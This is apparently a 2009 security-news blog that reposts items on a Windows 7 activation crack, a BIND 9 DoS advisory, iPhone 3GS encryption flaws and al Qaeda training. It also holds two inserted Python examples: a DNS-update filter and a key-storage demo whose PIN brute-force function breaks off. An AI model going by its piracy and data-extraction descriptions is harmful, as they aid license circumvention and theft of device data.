Friday, July 31, 2009

Windows 7 Ultimate Activation Cracked with OEM Master Key

Via arstechnica.com -

Windows 7 Ultimate has been cracked. The pirate milestone, reached almost three months before Windows 7 is set to hit General Availability on October 22, 2009, was achieved via OEM instant offline activation that passes Windows Genuine Advantage validation and keeps the operating system permanently activated. Previous cracks weren't as solid: while they may be working now, they can easily be disabled by Microsoft. This one won't be so easy.

Both 32-bit and 64-bit Windows 7 Ultimate can now easily be activated, according to My Digital Life. For Windows 7 Professional, Windows 7 Home Premium, Windows 7 Home Basic, and Windows 7 Starter, the OEM-System-Locked Preinstallation (SLP) keys haven't been leaked, so they cannot be OEM-activated yet. It won't be long before easy-to-use Windows 7 activation toolkits start appearing in the wild.

The story begins with a Windows 7 Ultimate OEM DVD ISO from Lenovo leaking to a Chinese forum. The boot.wim file was then used to retrieve the OEM-SLP product key and OEM certificate for Windows 7 Ultimate. The SLP is a procedure used by Microsoft to preactivate the Windows operating system for mass distribution by major OEMs. Windows 7 and Windows Server 2008 R2 use SLP version 2.1, which is backwards-compatible with version 2.0, the version Windows Vista and Windows Server 2008 use. As such, after the OEM certificate and OEM product key were extracted, it was discovered that Windows 7 uses the same digitally signed OEM certificate, which has an .xrm-ms extension, that Vista uses.

The extracted Windows 7 Ultimate OEM-SLP product key can be used to activate an installed Windows 7 Ultimate system, and since the product key appears to be a master OEM-SLP product key for Windows 7 Ultimate, it can activate Windows 7 Ultimate from any OEM. Furthermore, even if the user already has a retail version of Windows 7 Ultimate installed, it can be converted to an OEM version with two simple commands, and then activated.

This is a major breakthrough for the Windows piracy world and a huge blow to Microsoft. Even if it was imminent, the fact that it has occurred so soon means pirates will have activated copies of Windows 7 a good week before even MSDN and TechNet subscribers get their hands on the RTM build on August 6, not to mention all the other groups Microsoft plans to give the build to. The Windows 7 RTM and Windows Server 2008 RTM build was compiled on July 13, 2009 and the official announcement was made on July 22, 2009.

Al Qaeda’s Training Changes In Response To US Strikes

Via CNN (h/t National Terror Alert) -

The interrogations of two accused Westerners who say they trained and fought with al Qaeda in the Pakistan-Afghanistan border region provide an inside view of the terror group's organizational structures.

Arguably, they shed more light on the state of al Qaeda than any material previously released into the public domain.

The documents reveal training programs and the protective measures the terrorist organization has taken against increasingly effective U.S. missile strikes.

Bryant Vinas -- a U.S. citizen who says he traveled to Pakistan in September 2007 to fight against Americans in Afghanistan -- stated that between March and July 2008 he attended three al Qaeda training courses, which focused on weapons, explosives, and rocket-based or -propelled weaponry.

During these classes, attended by 10-20 recruits, Vinas was taught how to handle a large variety of weapons and explosives, some of them of military grade sophistication, according to his account.

Vinas stated he became familiar with seeing, smelling and touching different explosives such as TNT, as well as plastic explosives such as RDX, and Semtex, C3 and C4 -- the explosive U.S. authorities have stated was used in al Qaeda's attack on the USS Cole in 2000. Vinas also learned how to make vests for suicide bombers.

Vinas stated he was also instructed how to prepare and place fuses, how to test batteries, how to use voltmeters and how to build circuitry for a bomb.

According to his account, al Qaeda also offered a wide variety of other courses including electronics, sniper, and poisons training. Instruction in the actual construction of bombs, he stated, was offered to al Qaeda recruits who had become more advanced in their training.

[...]

Othmani provided interesting new details about the training facilities being used by al Qaeda in the tribal areas.

His group trained in a small mountain shack, a far cry from the large camps al Qaeda had run in Taliban-era Afghanistan, when it had been able to operate with little danger of being targeted by military strikes.

Othmani's account made clear that al Qaeda has had to decentralize its operations in Pakistan in response to the growing effectiveness of U.S. Predator strikes.

However the wide number of training courses described by both Vinas and Othmani suggest that al Qaeda has been able to adapt well to the new security environment.

[...]

Vinas stated that when they completed their training, Al Qaeda instructors did a written evaluation of their performance. Vinas had been judged qualified to participate in missile attacks against U.S. and NATO bases in Afghanistan, according to his account.

That suggests al Qaeda has maintained its capacity for administration and paperwork even in a harsher security environment.

[...]

He is believed to be still at large in the Pakistan-Afghan border area. Vinas was told that the training course that Hafith set up focused on kidnapping and assassination, including instruction on the use of silencers and how to break into and enter a property.

The revelations raise the possibility that al Qaeda was developing a program of targeted assassinations. Though al Qaeda has carried out some assassinations in the past, most of its attacks in the West have not targeted any particular individuals but crowded areas, such as mass transport.

According to Othmani, al Qaeda fighters totaled between 300 and 500 in Pakistan's Tribal Areas - spread out in groups of 10. Such decentralization was a function of the growing deadliness of U.S. Predator strikes.

Hicham Beyayo, a Belgian jihadist volunteer, said the group moved around a lot because such strikes were known to be "very effective," his lawyer Christophe Marchand, told CNN.

The loss of an increasing number of operatives, stated Othmani, prompted an order from al Qaeda's top command for fighters to remain inside as much as possible. In order to keep in touch jihadists operated a courier service across the region, according to the Frenchman's testimony.

FCC Opens Investigation into Apple's Rejection of Google Applications

Via battellemedia.com -

And they are opening an investigation into it.

According to a Dow Jones Newswire report, on Friday afternoon the FCC sent letters to Apple, AT&T, and Google. The federal inquiry asks Apple why the Google Voice application was rejected from its App Store for the iPhone and iPod Touch, and why it removed third-party applications built on the Google app that had been previously approved. The federal commission also asks whether AT&T was allowed to weigh in on the application before it was rejected, and seeks a description of the application from its creator, Google, according to the report.

For background, see my piece chastising Apple here.

Thursday, July 30, 2009

Algorithm Sought by Air Force to Analyze Insider Behavior

Via GovInfoSecurity.org -

The Air Force is seeking an entrepreneurial innovator to develop technology to analyze the conduct of insiders to determine if they pose a threat to government IT systems.

In a call for proposals aimed at small businesses, posted on Tuesday, the Air Force is asking outside developers to "define, develop and demonstrate innovative approaches for determining 'good' (approved) versus 'bad' (disallowed/subversive) activities, including insiders and/or malware." For their initial efforts, the Air Force will pay up to $100,000.

The proposal says current techniques that monitor illicit activities only address the most blatant violations of policy or the grossest deviations from accepted behavior. Most systems concentrate their resources on repelling attacks at the network borders with little attention devoted to threats that evade detection and/or emanate from within. The proposal states:

"As such, there currently exists a great need across the federal, military and private sectors for a viable and robust means to provide near-real-time detection, correlation and attribution of network attacks, by content or pattern, without use of reactive previously-seen signatures. Many times, these trusted entities have detailed knowledge about the currently-installed host and network security systems, and can easily plan their activities to subvert these systems."

In the first phase, Air Force planners envision the development of a prototype algorithm that incorporates heuristic analysis for determining approved versus disallowed or subversive activities, including insiders and/or malware. The awarded contractor also would propose an architecture and perform a feasibility analysis of the algorithm and architecture during the initial phase.

In the second phase, the contractor would implement the best approach from Phase 1 in an experimental hardware/software environment, representative of the Air Force cyber infrastructure. They'd be asked to correlate Phase 1 analysis with experimental results as well as analyze the prototype system with respect to performance, scalability, cost, security and vulnerability.

Hafiz Mohammad Saeed – India’s Most Wanted Man Free Again in Pakistan

Via The Jamestown Foundation -

The release of Hafiz Mohammad Saeed, founder of proscribed Lashkar-e-Taiba (LeT) and Amir of Jama'at-ud-Da'wa (JuD), from detention last month in Pakistan has raised eyebrows in the West as well as India. He was released from house arrest on June 2 when the Lahore High Court ruled it did not have enough evidence against him on terrorism charges. However, Pakistan's Deputy Attorney General Shah Khawar says that Pakistan's law enforcement and intelligence agencies have enough evidence to suggest that a freed Hafiz Saeed is a continuing security threat. The Punjab provincial government and the federal government of Pakistan have already filed petitions before the Pakistani Supreme Court seeking a reversal of the decision of Lahore High Court. Nevertheless, the federal government continues to struggle to make an adequate case for his preventive detention and the Punjab provincial government has admitted its evidence is insufficient (The News [Islamabad], July 17; Daily Times [Lahore], July 17).

[...]

Hafiz Mohammad Saeed also met with Shaykh Abdullah Yusuf Azzam, an influential Palestinian jihad ideologue and mentor of Osama bin Laden. Azzam influenced him to found the Markaz Dawa-wa’l-Irshad (Center for Call and Guidance) in Muridke, Lahore in 1987. The institution preached jihad and the Wahhabi-Salafi form of Islam. Hafiz Saeed founded LeT in the early 1990s, allegedly with support from Inter-Services Intelligence (ISI), Pakistan's military intelligence agency. LeT then shifted the focus of its jihad from Afghanistan to Indian-administered Kashmir (The Hindu, June 3).

LeT is believed to have been involved in almost all major attacks against India over the disputed territory of Kashmir. Hafiz Saeed stepped down from the leadership of LeT soon after India blamed this group for the terrorist attack on its parliament in December 2001. He handed over leadership of the group to Maulana Abdul Wahid Kashmiri, who is based in Srinagar, part of Indian-administered Kashmir. Shortly after this, Pakistan banned LeT after the United States added it to its list of designated terrorist organizations.

However, Saeed was quick to revive his old Markaz Dawa-wa’l-Irshad organization with a slight modification of its name to Jama'at-ul-Da'wa, beginning as a charity and public welfare organization. It is common practice for militant organizations in Pakistan to rename themselves so as to bypass the law and avoid official bans. The old offices of LeT simply changed the names on their signboards with no significant change to the nature of the activities carried out inside. However, after 9/11, due to changes in Pakistan's policies towards India and pressure from the United States, Hafiz Saeed and his organization stepped back from aggressive jihadi activities in Kashmir. Despite this, several offices of LeT continued to recruit militants for jihad in Pakistan-administered Kashmir (BBC News, June 2).

India has long asked for the extradition of Hafiz Saeed, whom it suspects of being the mastermind behind all major terrorist attacks inside India. However, Pakistan’s government wants him to be tried inside Pakistan. So far, Pakistan has not brought sufficient evidence to punish him for his involvement in terrorist activities (Daily Times, June 5). Since 2001, he has been detained three times, but in every instance he was freed due to the apparent lack of evidence against him. In July 2006, India asked the Government of Pakistan to ban the JuD and arrest its leaders, including Hafiz Saeed, for their alleged involvement in the July 11 Mumbai train bombings that killed over 200 people. Pakistan rejected the Indian claims and put Hafiz Saeed under house arrest. He was released a month later (Hindustan Times, June 2).

The Pwnie Awards 2009 Winners

The Pwnie Awards is an annual awards ceremony celebrating and making fun of the achievements and failures of security researchers and the wider security community.

Pwnie Awards 2009 Winners....

Best server side bug = Linux SCTP FWD Chunk Memory Corruption

Best client side bug = msvidctl.dll MPEG2TuneRequest Stack buffer overflow

Best privilege escalation = Linux udev Netlink Message Privilege Escalation

Mass 0wnage = Red Hat Networks Backdoored OpenSSH Packages

Most innovative research = From 0 to 0day on Symbian

Lamest vendor response = Linux / Linus Torvalds

Most overhyped bug = MS08-067 Server Service NetpwPathCanonicalize() Stack Overflow

Best song = Nice Report

Most epic fail = Twitter Gets Hacked and the "Cloud Crisis"

Lifetime achievement award = Solar Designer

------------------------------

Special thanks to @shazzzam for the play-by-play on twitter. I had to run out after the "most epic fail" to catch my reservation @ MESA Grill.

For the curious foodies out there, I had the Fire Roasted Veal Chop with a glass of Voss Estate Pinot Noir...then the toasted coconut layer cake and black coffee for dessert. So very good.

Venezuela Increases Military Co-operation with Russia

Via Janes.com -

The televised signing of the 'New Statute on Military-Technical Co-operation' followed an earlier announcement by Venezuelan President Hugo Chávez on 24 July that Venezuela was intending to buy enough Russian tanks to double its fleet.

BIND 9 Denial of Service Attacks in the Wild

Via SANS ISC -

Earlier today Marc posted a short diary about a vulnerability in the Internet Systems Consortium's BIND 9 (all versions). As you almost certainly know, BIND is the most popular DNS service application, running on the majority of DNS servers today – and DNS is one service that we *really* need.

As the DoS attacks have been seen in the wild, and simple scripts that can be used to reproduce the attack are also easily available, this is not really surprising.

I wanted to draw your attention to this vulnerability (if you are running a BIND DNS server) – although the vulnerability exists in the dynamic update feature of BIND, even installations that have dynamic updates disabled are affected! This makes this vulnerability especially dangerous.

Only servers hosting master zones are vulnerable though, so even if the master DNS servers are down, all slaves should still continue to work (I'm not sure what happens if those slaves are masters for some other zones and they are subsequently taken down).

No workarounds exist – you might be able to create some firewall rules that will drop these packets though. In any case, it is recommended to upgrade your BIND DNS servers urgently from https://www.isc.org/node/474
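A defender-side exposure check for this advisory, added here as an example and not code from ISC or the SANS diary: it lists the zones a named.conf serves as master (only masters are exposed) and flags raw DNS UPDATE messages (opcode 5) aimed at one of them, which is the traffic a perimeter filter would have to drop. The sample named.conf and the packets are constructed for the example.

```python
import re
import struct
from typing import List, Optional

OPCODE_UPDATE = 5   # RFC 2136 dynamic update
TYPE_SOA = 6

# Constructed sample named.conf (zone names are documentation examples).
SAMPLE_NAMED_CONF = """
// constructed sample configuration
options { directory "/var/named"; };
zone "." IN { type hint; file "named.ca"; };
zone "example.com" IN {
    type master;
    file "example.com.zone";
    allow-update { none; };   /* updates disabled, yet still exposed */
};
zone "corp.example" IN { type slave; masters { 192.0.2.1; }; file "corp.bak"; };
"""

_TYPE_RE = re.compile(r"\btype\s+(\w+)\s*;", re.IGNORECASE)


def master_zones(named_conf: str) -> List[str]:
    """Return zones declared 'type master;' (comments stripped, braces matched by depth)."""
    text = re.sub(r"/\*.*?\*/", "", named_conf, flags=re.DOTALL)
    text = re.sub(r"(//|#)[^\n]*", "", text)
    masters = []
    for m in re.finditer(r'zone\s+"([^"]+)"', text):
        start = text.find("{", m.end())
        if start < 0:
            continue
        depth, i = 0, start
        while i < len(text):            # nested allow-update { ... }; must not end the zone
            if text[i] == "{":
                depth += 1
            elif text[i] == "}":
                depth -= 1
                if depth == 0:
                    break
            i += 1
        body = text[start + 1:i]
        t = _TYPE_RE.search(body)
        if t and t.group(1).lower() == "master":
            masters.append(m.group(1).lower().rstrip(".") or ".")
    return masters


def _read_name(msg: bytes, off: int):
    """Decode a wire-format domain name at off; follows compression pointers safely."""
    labels, end, jumped, hops = [], off, False, 0
    while True:
        length = msg[off]
        if length == 0:
            off += 1
            break
        if length & 0xC0 == 0xC0:        # compression pointer
            hops += 1
            if hops > 16:                # refuse pointer loops instead of spinning
                raise ValueError("pointer loop")
            if not jumped:
                end = off + 2
            jumped = True
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            continue
        labels.append(msg[off + 1:off + 1 + length].decode("ascii"))
        off += 1 + length
    if not jumped:
        end = off
    return ".".join(labels).lower() or ".", end


def classify_update(msg: bytes, masters) -> Optional[str]:
    """Return the zone if msg is a DNS UPDATE aimed at one of `masters`, else None.
    Malformed or truncated packets also yield None, so the filter itself cannot crash."""
    try:
        _txid, flags, zocount, _pr, _up, _ad = struct.unpack("!HHHHHH", msg[:12])
        if (flags >> 11) & 0xF != OPCODE_UPDATE or zocount != 1:
            return None
        zone, off = _read_name(msg, 12)
        ztype, _zclass = struct.unpack("!HH", msg[off:off + 4])
    except (IndexError, ValueError, struct.error, UnicodeDecodeError):
        return None
    if ztype != TYPE_SOA:                # the Zone section must carry SOA
        return None
    return zone if zone in masters else None


def build_message(zone: str, opcode: int, txid: int = 0x1234) -> bytes:
    """Construct a minimal DNS header plus one zone/question entry (constructed test traffic)."""
    header = struct.pack("!HHHHHH", txid, opcode << 11, 1, 0, 0, 0)
    labels = [l for l in zone.rstrip(".").split(".") if l]
    name = b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"
    return header + name + struct.pack("!HH", TYPE_SOA, 1)   # SOA, class IN
```

Where dynamic updates are genuinely unused, every packet this flags can be dropped until the upgrade is done; where updates are in use, the same check narrows a rule to untrusted sources rather than all update traffic.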

Apple: Jailbreaking Could Knock out Transmission Towers

Via PC World -

Apple has told the U.S. Copyright Office that modifying the iPhone's operating system could crash a mobile phone network's transmission towers or allow people to avoid paying for phone calls.

The claims are Apple's contribution to the Copyright Office's regular review of the U.S. Digital Millennium Copyright Act (DMCA), a law that forbids the circumvention of copy control mechanisms.

Apple says that modification of the phone's software, a process known as jailbreaking, could lead to major network disruptions. Jailbreaking gets around the copyright control features that prohibit, for example, the installation of applications unapproved by Apple.

Apple's arguments, filed June 23, seek to rebut a request to the agency by the digital rights group Electronic Frontier Foundation (EFF) that modifications to the iPhone's software do not violate the DMCA and should be allowed.

The U.S. Copyright Office holds hearings every three years to consider requests to make exceptions to the nation's copyright law.

Jailbreaking continues to be popular with iPhone users, who can also then use their devices on the networks of operators who have not signed distribution deals with Apple.

Apple argues that the practice constitutes copyright infringement. No one has been prosecuted for jailbreaking, although Apple discourages it.

Apple's latest filing describes potentially severe technical problems operators could face with jailbroken phones.

Since the OS code is accessible on a jailbroken phone, Apple said it would be possible to reprogram one to gain access to the phone's BBP (baseband processor), which controls the connection to the operator's network.

"Because jailbreaking makes hacking of the BPP software much easier, jailbreaking affords an avenue for hackers to accomplish a number of undesirable things on the network," the filing said.

By gaining access to the BBP, hackers could change the phone's ECID (exclusive chip identification), which identifies a phone to the transmission towers, Apple said.

"With access to the BBP via jailbreaking, hackers may be able to change the ECID, which in turn can enable phone calls to be made anonymously (this would be desirable to drug dealers, for example) or charges for the calls to be avoided," Apple said.

While some of Apple's claims may be true, network operators rely on a separate identifier, contained in the phone's SIM (Subscriber Identity Module), to distinguish between customers for billing and authentication purposes.

Apple went on to say that if several phones were modified to have the same ECID, it could cause a transmission tower to malfunction or kick phones off the network. Also, operator limits on data transmission could be circumvented, allowing a hacker to conduct a denial-of-service attack and crash the tower.

"In short, taking control of the BPP software would be much the equivalent of getting inside the firewall of a corporate computer -- to potentially catastrophic result," Apple said.

Technical considerations aside, the EFF has argued that Apple's lock on the iPhone is unmerited from a copyright protection perspective and aims to "suppress competition from independent iPhone application vendors."

The Copyright Office is expected to make a decision in the case later this year.

Data Detailing New York Stock Exchange Network Exposed on Unsecured Server

Via Wired.com (Threat Level) -

Sensitive information about the technical infrastructure of the New York Stock Exchange’s computer network was left unsecured on a public server for possibly more than a year, Threat Level has learned.

The data, which was removed after Threat Level disclosed the situation to the NYSE, included several directories of files containing logs; server names; IP addresses; lists of hardware; lists of software versions running on the network; and configuration and patch histories, including what patches have not yet been installed. It was all available on a publicly accessible, unprotected FTP server maintained by EMC, a company that sells storage systems and managed services to the NYSE and other companies.

“We have discussed the matter with EMC and at this point we believe that there has been no impact on our operations or our customers,” said NYSE spokeswoman Mirtha Medina in an e-mail.

“Unless the NYSE knows that this stuff is out there and has approved for it to be out there (highly doubtful), I see no good reason why EMC is allowing this to happen,” said an information security specialist via e-mail who asked not to be named because he works in the financial industry. “Leaving information like this in a ‘public’ place definitely would make a bad guy’s job somewhat easier.”

The information could allow an intruder to map the NYSE’s network architecture and determine what vulnerabilities exist in the system.

Cheerleader Sues School, Coach After Illicit Facebook Log-in

Via arstechnica.com -

At this point, you would think that most users would be aware that they should keep embarrassing information off of Facebook. Everyone from potential employers to the press regularly check users' accounts on the service, looking for evidence of illicit or debauched behavior, and a number of jobs have been lost due to the information found there. Still, many fail to exercise discretion when using the service, people in positions of power are catching on, and there continue to be problems that result from the blurring of boundaries between public and private.

In what may be the latest example, a suit was filed in Mississippi that alleges a school official—more specifically a teacher acting in her capacity as a cheerleading coach—demanded that members of her squad hand over their Facebook login information. According to the suit, the teacher used it to access a student's account, which included a heated discussion of some of the cheerleading squad's internal politics. That information was then shared widely among school administrators, which resulted in the student receiving various sanctions.

As we noted when Bozeman, Montana attempted to obtain login credentials from anyone applying for a municipal job, it's easy for anyone to view pictures and text that a Facebook user has chosen to make public simply by signing up for an account with the service. By demanding login credentials, authorities gain access to materials that users have chosen to keep private. Whether this is done because people intend to get access to private data or because they are simply unfamiliar with how Facebook operates isn't always obvious, and probably varies from case to case.

According to this suit, the student's login details were requested during school hours, and the teacher accessed the account the same day. The account included the contents of a discussion between the student and a fellow member of the school's cheerleading squad about its internal politics, which was then allegedly shared with other squad supervisors and the school administration. The student was then "publicly reprimanded, punished, and humiliated" due to the contents of that discussion.

The student was allegedly forced to sit out of various school activities and had difficulties arranging her academic schedule to avoid taking classes from any of the individuals who were both coaches and teachers. Her parents claim that attempts to discuss the problem with school administrators brought them no relief.

The Student Press Law Center has a more detailed account (via TechDirt) of the events, in which it reports that several other students who were asked for their logins simply deleted their accounts using their cell phones, preventing this sort of intrusion; the school apparently has a filter that blocks access to Facebook's Web interface from school computers. It also suggests that the initial search of the Facebook accounts was done with the intent of finding pictures of the students smoking or drinking.

In any case, the suit alleges that the school's administration and staff, along with five John Does, violated the student's Constitutional rights to privacy, free speech and association, and subjected her to cruel and unusual punishment. There are also charges of causing emotional distress, defamation of character, and civil conspiracy. In general, courts have concluded that public school students have some constitutional rights, but only a subset of those afforded to the general populace. It may be that the student's lawyers are aiming broadly in order to find some area of constitutional law in which the student is clearly protected.

In any case, the message should be clear: either through malice or cluelessness, people in positions of authority are increasingly demanding complete access to users' personal accounts and, in moments of weakness, many users appear to be giving it to them. If there's information you're not comfortable sharing with the world, Facebook, Twitter, and similar services aren't the place for it.

Monday, July 27, 2009

Vegas Baby! Vegas!

So, I am packing for Blackhat 2009 and Defcon 17. Should be there before 5pm local time tomorrow.

Blog might be a little quiet this week, but I will try to post when I can...when I am not "working" or being social. =)

Russian Navy Accidentally Dummy Shells Vladivostok

Via Moscow Times -

A dummy shell fired from a warship veered off course Friday and landed just feet from a building in a residential area of Vladivostok, less than two months after a similar incident off the Gulf of Finland.

The anti-ship shell was fired during rehearsals for Sunday’s Navy Day celebrations in the far eastern port. For reasons yet to be determined, the projectile changed course after takeoff and landed beside a nine-story building, breaking windows and leaving a 1.5-meter crater, RIA-Novosti reported.

No one was hurt in the incident, and the Navy said it was investigating.

A bomb disposal team from the Pacific Fleet was sent to dig out and remove the shell. Military officials said it was intended only to make a sound effect for the parade.

Pacific Fleet spokesman Roman Martov said experts would evaluate what caused the bomb to deviate from its course. “All the parameters were set right, it was supposed to fall into the ocean,” he said, Interfax reported.

On May 28, a similar incident happened in the Leningrad region, when a Russian warship in the Gulf of Finland fired 14 shells in the direction of a dacha settlement on shore.

Fragments of the shells rained down on the village, but damage was minimal and no one was injured. The Navy later promised the dacha settlement “several tens of thousands of rubles” in damages, Ekho Moskvy reported.

Microsoft Office Visualization Tool (OffVis)

http://www.microsoft.com/presspass/press/2009/jul09/07-27BlackHat09PR.mspx

A free tool designed to help combat file format-based software vulnerabilities and exploits, OffVis will allow customers to better understand and deconstruct Microsoft Office-based attacks. As a result, security vendors can build deeper, more precise malware detection signatures and develop new techniques for analyzing malware. The tool is available for no-charge download.

Advance Notification for July 2009 Out-of-Band Releases

http://blogs.technet.com/msrc/archive/2009/07/24/advance-notification-for-july-2009-out-of-band-releases.aspx

We have just published our advance notification for an out-of-band security bulletin release, with a target of 10:00 AM Pacific Time next Tuesday, July 28, 2009.

While this release is to address a single, overall issue, in order to provide the broadest protections possible to customers, we’ll be releasing two separate security bulletins:

1. One Security Bulletin for Visual Studio
2. One Security Bulletin for Internet Explorer

While we can’t go into specifics about the issue prior to release, we can say that the Visual Studio bulletin will address an issue that can affect certain types of applications. The Internet Explorer bulletin will provide defense-in-depth changes to Internet Explorer to help provide additional protections for the issues addressed by the Visual Studio bulletin. The Internet Explorer update will also address vulnerabilities rated as Critical that are unrelated to the Visual Studio bulletin that were privately and responsibly reported.

Customers who are up to date on their security updates are protected from known attacks related to this Out of Band release.

Nearly Half Of Companies Lack A Formal Patch Management Process

Via DarkReading -

An open initiative for building a metrics model to measure the cost of patch management found that one-fourth of organizations don't test patches when they deploy them, and nearly 70 percent don't measure how well or efficiently they roll out patches, according to survey results released today.

Project Quant, a project for building a framework for evaluating the costs of patch management and optimizing the process, today also rolled out Version 1 of its metrics model. Project Quant is an open, community-driven, vendor-neutral model that initially began with financial backing from Microsoft.

"Based on the survey and the additional research we performed during the project, we realized that despite being one of the most fundamental functions of IT, patch management is still a relatively immature, inconsistent, and expensive practice. The results really reinforced the need for practical models like Quant," says Rich Mogull, founder of Securosis, and one of the project leaders of the initiative.

The survey of around 100 respondents was voluntary and participation was solicited mainly via metrics and patch management organizations, so the organizers say the respondents were most likely organizations that take patch management seriously: "The corollary to this interpretation is that we believe the broader industry is probably LESS mature in their patch management process than reflected here," the report says.

Even so, over 40 percent of them have either no patch management process in place, or an informal one. And 68 percent say they don't have a metric for measuring how well they deploy patches, such as the time it takes them to deploy a patch, etc. One-fourth say they don't do any testing before they roll out a patch, and 40 percent rely on user complaints to validate the success of a patch, according to the survey.

And over 50 percent don't measure adherence to policy, including compliance when it comes to patching.

"It's clear we have a very long way to go on something we all assume is a boring, basic task. Considering where the bad guys are shifting attacks to, we desperately need better methods and means of keeping our systems up to date," Mogull says. "My hope is that Quant can help fill this gap."

Patch management for workstation and server operating systems was one of the most mature processes. "What's most interesting is the variation of maturity [of patch management] across platforms. Not that this was totally unexpected, but the least mature areas of patching seem to correlate almost directly with the fastest-growing areas of attacks," Mogull says, such as device drivers, database servers, business application servers, and networking hardware and software.

Meanwhile, Project Quant's survey is ongoing, so if you'd like to participate, visit this link.

--------------------------

As a former patch administrator... this topic hits home with me.

So many companies are behind the curve on patch management, it is quite shocking.

Kevin Spacey Tries, Fails To Explain Twitter To Letterman

802.11N Becomes Official In September

Via DSLReports.com -

Last Friday, Bob Heile, the chairman of the IEEE 802.15 working group on Personal Area Networks, noted that the 802.11N Wi-Fi standard has finally been sent on to the Standards Review Committee. That means, assuming no further hiccups, that the standard will become finalized by September. The ratification process stems back nearly five years, slowed by a factionalized debate over competing technologies. A draft version of 802.11n was approved in January 2006, and the first wave of 802.11N hardware hit the market -- with all subsequent evolutions (supposedly) applied by firmware update.

Sunday, July 26, 2009

Matasano Hack by Anti-Sec Supporters

http://seclists.org/fulldisclosure/2009/Jul/0388.html

Mirror Screenshot
http://users.volja.net/database/matasano.PNG

Currently the Matasano website appears to be down, which is a good indication that this is no fake.

PhreakNIC 12 Videos

PhreakNIC is an annual convention for hackers, phone phreaks, cypherpunks, programmers, civil libertarians, ham/scanner enthusiasts, security experts, feds, and culture jammers held in Nashville, TN.

IronGeek.com has put together an index page for all the videos...
http://www.irongeek.com/i.php?page=videos/pn12/phreaknic-12-videos

Defcon iPhone Application

http://www.group6.net/Defcon_App.html

DEFCON® Hacker Conference - The Hacker Community's Foremost Social Network.

After years of misplaced, begged, borrowed, stolen Defcon schedules, we decided to do something to help. Introducing the Defcon iPhone app. Get all the up to date details on the con on your iPhone/iPod Touch. In addition to that, you can view the official Defcon RSS feed and #defcon Twitter posts. Talk and event calendars, speaker and dj bios, and a map of the venue.

Features:

1. Talk Calendar
2. Event Calendar
3. Speaker/DJ Biographies
4. Defcon RSS Feed Reader
5. Twitter #defcon

Status: Available Soon

The app has currently been submitted for Apple’s approval into their store. We’re looking at other options for distribution in case the app does not get approved in time. Follow @dtjedi or @tkimball via twitter for updates or check back here.

Saturday, July 25, 2009

Hacker Says iPhone 3GS Encryption Is ‘Useless’ for Businesses

Via Wired.com -

Apple claims that hundreds of thousands of iPhones are being used by corporations and government agencies. What it won’t tell you is that the supposedly enterprise-friendly encryption included with the iPhone 3GS is so weak it can be cracked in two minutes with a few pieces of readily available freeware.

“It is kind of like storing all your secret messages right next to the secret decoder ring,” said Jonathan Zdziarski, an iPhone developer and a hacker who teaches forensics courses on recovering data from iPhones. “I don’t think any of us [developers] have ever seen encryption implemented so poorly before, which is why it’s hard to describe why it’s such a big threat to security.”

With its easy-to-use interface and wealth of applications available for download, the iPhone may be the most attractive smartphone yet for business use. Many companies seem to agree: In Apple’s quarterly earnings conference call Tuesday, Apple chief operating officer Tim Cook said almost 20 percent of Fortune 100 companies have purchased 10,000 or more iPhones apiece; multiple corporations and government organizations have purchased 25,000 iPhones each; and the iPhone has been approved in more than 300 higher education institutions.

But contrary to Apple’s claim that the new iPhone 3GS is more enterprise friendly (for reference, see Apple’s security overview for iPhone in business [pdf]), the new iPhone 3GS’ encryption feature is “broken” when it comes to protecting sensitive information such as credit card numbers and social-security digits, Zdziarski said.

Zdziarski said it’s just as easy to access a user’s private information on an iPhone 3GS as it was on the previous generation iPhone 3G or first generation iPhone, both of which didn’t feature encryption. If a thief got his hands on an iPhone, a little bit of free software is all that’s needed to tap into all of the user’s content. Live data can be extracted in as little as two minutes, and an entire raw disk image can be made in about 45 minutes, Zdziarski said.

Wondering where the encryption comes into play? It doesn’t. Strangely, once one begins extracting data from an iPhone 3GS, the iPhone begins to decrypt the data on its own, he said.

To steal an iPhone’s disk image, hackers can use popular jailbreaking tools such as Red Sn0w and Purple Ra1n to install a custom kernel on the phone. Then, the thief can install a Secure Shell (SSH) client to port the iPhone’s raw disk image across SSH onto a computer.
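The reason the encryption "doesn't come into play" is where the key lives: if the phone can decrypt without any user secret, anyone who gets code running on the phone gets the same service. To make that concrete, here is a small added Python example (mine, not Zdziarski's tooling and not Apple's design): a toy cipher stands in for the disk encryption, and the two models differ only in whether the key is something the device already holds or something derived from the user's passcode. The key-check value, iteration counts and sample data are assumptions for the demo.

```python
import hashlib
import os


def toy_stream_xor(key: bytes, data: bytes) -> bytes:
    """Toy cipher for illustration only: SHA-256 in counter mode as a keystream, XORed
    into the data. Symmetric, so the same call decrypts. Not a real disk-encryption design."""
    out = bytearray()
    for block, off in enumerate(range(0, len(data), 32)):
        keystream = hashlib.sha256(key + block.to_bytes(8, "big")).digest()
        out += bytes(a ^ b for a, b in zip(data[off:off + 32], keystream))
    return bytes(out)


# --- Model 1: the key the device uses needs no user secret -----------------------------
def make_device_key_image(plaintext: bytes) -> dict:
    """The OS holds a device key and uses it transparently. A raw image taken by code
    running on the phone comes with that key (or the phone simply decrypts on request),
    which is the situation the article describes."""
    device_key = os.urandom(32)
    return {"ciphertext": toy_stream_xor(device_key, plaintext), "device_key": device_key}


def attacker_reads_device_key_image(image: dict) -> bytes:
    """No passcode, no cracking: the key material travelled with the image."""
    return toy_stream_xor(image["device_key"], image["ciphertext"])


# --- Model 2: key derived from the user's passcode ------------------------------------
def make_passcode_image(plaintext: bytes, passcode: str, iterations: int = 100_000) -> dict:
    """The raw image holds salt, iteration count, ciphertext and a key-check value,
    but not the key: it has to be re-derived from the passcode."""
    salt = os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", passcode.encode(), salt, iterations)
    return {
        "ciphertext": toy_stream_xor(key, plaintext),
        "salt": salt,
        "iterations": iterations,
        "key_check": hashlib.sha256(b"check" + key).digest(),   # assumed check construction
    }


def decrypt_passcode_image(image: dict, passcode: str):
    """Returns the plaintext, or None if the passcode does not reproduce the key."""
    key = hashlib.pbkdf2_hmac("sha256", passcode.encode(), image["salt"], image["iterations"])
    if hashlib.sha256(b"check" + key).digest() != image["key_check"]:
        return None
    return toy_stream_xor(key, image["ciphertext"])


def brute_force_pin(image: dict, digits: int = 4):
    """The residual risk of model 2: with the image in hand the guessing is offline, so a
    short numeric PIN only holds as long as the iteration count makes 10**digits
    derivations expensive. Returns (pin, plaintext) or None."""
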